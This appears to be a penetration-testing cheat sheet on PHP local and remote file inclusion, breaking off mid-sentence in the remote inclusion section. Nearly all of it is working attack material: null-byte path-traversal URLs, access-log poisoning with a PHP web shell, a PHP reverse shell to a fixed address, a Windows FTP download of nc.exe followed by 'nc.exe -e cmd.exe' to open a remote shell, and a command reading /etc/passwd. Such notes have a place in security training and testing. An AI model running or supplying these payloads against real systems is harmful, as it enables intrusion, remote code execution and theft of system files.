42 lines
1.5 KiB
Plaintext
42 lines
1.5 KiB
Plaintext
|
|
|||
|
|
Local File Inclusion
|
|||
|
|
====================
|
|||
|
|
|
|||
|
|
The %00 make php 5.3 and below ignore everything after that.
|
|||
|
|
|
|||
|
|
Testing: http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&LANG=en../../../../../windows/system32/drivers/etc/hosts%00
|
|||
|
|
...then let's add code to the access log :)
|
|||
|
|
~# nc 192.168.1.1 80
|
|||
|
|
<?php echo shell_exec($_GET['cmd']);?>
|
|||
|
|
...and use it
|
|||
|
|
http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&cmd=ipconfig&LANG=en../../../../../../xampp/apache/logs/access.log%00
|
|||
|
|
...or php shell on linux:)
|
|||
|
|
<?php $s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");?>
|
|||
|
|
...finally send the requests to nc and exploit:
|
|||
|
|
|
|||
|
|
# Windows FTP upload
|
|||
|
|
echo open 192.168.1.1 21 > ftp.txt && echo haxy>> ftp.txt && echo haxy >> ftp.txt && echo bin >> ftp.txt && echo GET nc.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt
|
|||
|
|
nc.exe -e cmd.exe 192.168.1.1 31337
|
|||
|
|
|
|||
|
|
- - - - - - - -
|
|||
|
|
<? system('echo open 192.168.1.1 21 > ftp.txt'); ?>
|
|||
|
|
<? system('echo haxor >> ftp.txt'); ?>
|
|||
|
|
<? system('echo haxor >> ftp.txt'); ?>
|
|||
|
|
<? system('echo bin >> ftp.txt'); ?>
|
|||
|
|
<? system('echo GET nc.exe >> ftp.txt'); ?>
|
|||
|
|
<? system('echo bye >> ftp.txt'); ?>
|
|||
|
|
<? system('ftp -s:ftp.txt'); ?>
|
|||
|
|
<? system('nc.exe -e cmd.exe 192.168.1.1 31337'); ?>
|
|||
|
|
|
|||
|
|
<?php phpinfo()?>
|
|||
|
|
<? system("cat /etc/passwd"); ?>
|
|||
|
|
<?php echo shell_exec($_GET["cmd"]);?>
|
|||
|
|
<?php include="124.1.1.1" ?>
|
|||
|
|
|
|||
|
|
|
|||
|
|
Remote file Inclusion
|
|||
|
|
=====================
|
|||
|
|
Example: http://192.168.1.1/add.php?name=asdasd&LANG=http://192.168.1.1/login.txt%00
|
|||
|
|
Note: the login.txt contains
|
|||
|
|
|